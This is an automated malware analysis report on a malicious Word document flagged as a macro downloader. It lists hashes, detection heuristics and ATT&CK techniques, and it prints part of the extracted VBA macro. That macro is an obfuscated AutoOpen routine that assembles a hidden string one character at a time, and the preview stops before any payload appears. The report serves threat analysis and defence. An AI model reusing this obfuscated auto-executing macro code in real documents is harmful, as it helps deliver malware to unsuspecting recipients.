Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 281b52eff11afbba…

MALICIOUS

Office (OLE)

262.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 81624c04d51444e2388126dcde1f07ce SHA-1: 423c585f6b518577c169082da287ea0644e02c45 SHA-256: 281b52eff11afbba6b1f7c771b94e6b64f54a9ac5cec394df0488c422de964b3
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a secondary payload, as indicated by the 'GetObject' call and the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0'. The presence of the AutoOpen macro and the GetObject call strongly suggests an attempt to download and execute a malicious second-stage payload, typical of a spearphishing attachment.

Heuristics 7

  • ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 80976 bytes
SHA-256: 02984bf8f715029b442972e0a2e9f0c76ca056fa6bc41baf51d17a9b38c5a863
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub ginOBEawihelIMIQUwEQUCA()
PIxALucOLAWuQEq = InStr("LarAdONIvIS", "LarAdONIvISLarAdONIvIS")


Debug.Print "iyjiQYsIGeB"
Debug.Print "hEJuTeBademOnyUv"
End Sub
Sub AutoOpen()
On Error Resume Next
Dim disaXAQipeVITIFOFEPEPetY
disaXAQipeVITIFOFEPEPetY = Rnd(116)
If disaXAQipeVITIFOFEPEPetY > 77413 Then
   disaXAQipeVITIFOFEPEPetY = Exp(6)
End If
Debug.Print "xEdamiPOSzyKAzy"

XuSYaGAbATituQiHEQUiyJE = 9353
Dim JAJTAzysoKEJAS
JAJTAzysoKEJAS = Rnd(107)
If JAJTAzysoKEJAS > 53264 Then
   JAJTAzysoKEJAS = Exp(7)
End If
Dim RIpEsihifEM
RIpEsihifEM = Log(7)

RIpEsihifEM = RIpEsihifEM + Log(11)

Debug.Print "NaFoBuYfixarut"
LUhIZeJAFiTIVe = InStr("bijYkIvyzagEQukawEiUi", "bijYkIvyzagEQukawEiUibijYkIvyzagEQukawEiUi")
CiSoLelTOKoCubUjAMuBU = ""
Debug.Print "mupyXefeSUFOpUp"
NUtARAPeqUPY = InStr("HyZYfAfoRyteQylOLucu", "HyZYfAfoRyteQylOLucuHyZYfAfoRyteQylOLucu")
Dim FAlOQoZazeKOMu
xUiejOwiqAs = Val("71369.1") & "rozylEdAWYHjIfuXa"
FAlOQoZazeKOMu = Rnd(129)
DIxoQEKowuTuHYe = Val("11095.6") & "aJIgonKPAVOrUBYVYvU"
If FAlOQoZazeKOMu > 98873 Then
Debug.Print "zDxoWAKykaMiCyXYd"
Dim NUrIguMyZaFIqIrkAlaie
For NUrIguMyZaFIqIrkAlaie = 5 To 10
   Dim FIWOCFOSIpxEcuxY
   FIWOCFOSIpxEcuxY = Fix(88763)
Next
   FAlOQoZazeKOMu = Exp(9)
guXuXuTYsIaUHiCOXEGA = 99821
ZiDimAjOrizoxiiEFYk = 11584
End If

duKeTOMEnYKeailUKEnYa = InStr("JIhOByzIVAbOGaCIgOzeTI", "JIhOByzIVAbOGaCIgOzeTIJIhOByzIVAbOGaCIgOzeTI")
JylAaYJUpYmILElIs = 80468

KaxeMozEgefosEqApy = Val("36692.3") & "EHOxoZYCAP"
 CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((273 + 546) = 819, "s", "CgA")

Debug.Print "jOtYJIreFUxaw"
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((331 + 662) = 993, "c", "tW9")
PASAtoZixYPUCUvitot = InStr("WaspAqsiSoRAkEG", "WaspAqsiSoRAkEGWaspAqsiSoRAkEG")

Dim xHamivygajETUVawyBUsu
beMImOzEZOxUcawOdeh = InStr("TudYJoWeGEFyJUsaxUbiS", "TudYJoWeGEFyJUsaxUbiSTudYJoWeGEFyJUsaxUbiS")
Dim toBUMUsaVaQUmyh
toBUMUsaVaQUmyh = Log(7)

toBUMUsaVaQUmyh = toBUMUsaVaQUmyh + Log(12)
xHamivygajETUVawyBUsu = Rnd(105)
If xHamivygajETUVawyBUsu > 50599 Then
XeXelAVoXULHaNvYT = Val("69254.8") & "pycijaQyNoWe"
Dim TIWUauKAhIpIWSOio
TIWUauKAhIpIWSOio = Rnd(124)
If TIWUauKAhIpIWSOio > 59098 Then
   TIWUauKAhIpIWSOio = Exp(4)
End If
   xHamivygajETUVawyBUsu = Exp(5)
NUFgUaQUgyxY = 37883
Debug.Print "fuGiGyNudoTAHoryZq"
End If
CiEDemopAboDyiaAJIRah = 21984
KENacOqUFISAsAm = InStr("aacYvUmYLalIbO", "aacYvUmYLalIbOaacYvUmYLalIbO")
Debug.Print "uSiPIxocOJYtVDunAjI"
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((246 + 492) = 738, "r", "pY")
lemAitOveSADIoxEja = Val("92589.6") & "zUaeqecokuGiCaQohATUM"
Dim iUxOtiaIaXYnOjlatyW
For iUxOtiaIaXYnOjlatyW = 7 To 12
   Dim zoBEluqykiweNoliBeos
   zoBEluqykiweNoliBeos = Fix(55907)
Next

Debug.Print "iTaNIWOQyKIcUVUSAGU"
pICeiIbYTyMIx = InStr("DOLAFoXibADAPaiAkej", "DOLAFoXibADAPaiAkejDOLAFoXibADAPaiAkej")
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((65 + 130) = 195, "i", "b1EW")
pOSjUPIXEKoXOMO = Val("7892.4") & "rUZYlYPUDIP"
CohusSuayVeceMace = 70261
Debug.Print "biHADoNobUvaJot"
zaGYBahzohYbUayGoHaqah = InStr("GeNseJlOHEvaF", "GeNseJlOHEvaFGeNseJlOHEvaF")

Dim POheiYDEVYjYDUwyqUNyz
For POheiYDEVYjYDUwyqUNyz = 7 To 11
   Dim xuRyFIVakeJagudyDea
   xuRyFIVakeJagudyDea = Fix(35995)
Next
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((141 + 282) = 423, "p", "1q")

Debug.Print "DaPUbIJOLuZoFiBIvIfokOZo"
xUqakAdUdOiex = InStr("sYfOcUKEGeDnygONew", "sYfOcUKEGeDnygONewsYfOcUKEGeDnygONew")
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((299 + 598) = 897, "t", "78Pq")
RuFoPOGEgEfAGm = InStr("KOTImuRArYhIJO", "KOTImuRArYhIJOKOTImuRArYhIJO")
NICkOLoLizAgI = 59205

Dim ZyMIMicoHaJIjiNoMufo
ZyMIMicoHaJIjiNoMufo = Log(9)

ZyMIMicoHaJ
... (truncated)